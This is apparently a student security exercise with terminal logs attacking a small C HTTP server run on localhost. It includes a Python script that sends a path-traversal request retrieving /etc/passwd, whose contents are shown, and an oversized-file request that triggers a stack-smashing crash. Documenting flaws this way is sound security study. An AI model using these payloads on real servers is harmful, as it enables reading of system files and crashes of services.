1_attack.md

ahnmo@peterparker:~$ cat is511.py 
import socket

HOST = 'localhost'
PORT = 3000

payload = 'GET /../../../../../../../../etc/passwd HTTP/1.0\r\n\r\n'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.sendall(payload)
data = s.recv(1024)
s.close()
print 'Received', repr(data)
ahnmo@peterparker:~$ python is511.py 
Received 'HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 530\r\n\r\n\r\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nHTTP/1.1 200 OK\r\n\x00'
ahnmo@peterparker:~$

1_victim.md

ahnmo@peterparker:~/Git/http-server$ ./HTTP-Server 
*************************************
*                                   *
*        A Simple Web Server        *
*                                   *
* Author: Adam Peryman              *
* Contact: [email protected]   *
*************************************
Waiting..

Waiting..

Sending: ../../../../../../../../etc/passwd
Sent: /cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nHTTP/1.1 200 OK


Waiting..

2_attack.md

ahnmo@peterparker:/data/Git/http-server$ python -c 'print "A" * (0x640+128)' > ex.txt
ahnmo@peterparker:/data/Git/http-server$ curl http://localhost:3000/ex.txt

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAahnmo@peterparker:/data/Git/http-server$ 1.1 200 OK
ahnmo@peterparker:/data/Git/http-server$

2_victim.md

ahnmo@peterparker:~/Git$ git clone https://github.com/x0bile/http-server
Cloning into 'http-server'...
remote: Counting objects: 235, done.
remote: Total 235 (delta 0), reused 0 (delta 0), pack-reused 235
Receiving objects: 100% (235/235), 27.80 KiB | 30.00 KiB/s, done.
Resolving deltas: 100% (101/101), done.
Checking connectivity... done.
ahnmo@peterparker:~/Git$ cd http-server/
ahnmo@peterparker:~/Git/http-server$ make
gcc -I./include -W -Wall   -c -o lib/file-handling.o lib/file-handling.c
gcc -I./include -W -Wall   -c -o lib/output.o lib/output.c
gcc -I./include -W -Wall   -c -o lib/sockets.o lib/sockets.c
gcc -I./include -W -Wall   -c -o src/http-server.o src/http-server.c
gcc -o HTTP-Server lib/file-handling.o lib/output.o lib/sockets.o src/http-server.o -I./include -W -Wall -lm
ahnmo@peterparker:~/Git/http-server$ ./HTTP-Server 
*************************************
*                                   *
*        A Simple Web Server        *
*                                   *
* Author: Adam Peryman              *
* Contact: [email protected]   *
*************************************
Waiting..

Waiting..

Sending: ex.txt
Sent: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHTTP/1.1 200 OK


Waiting..

*** stack smashing detected ***: ./HTTP-Server terminated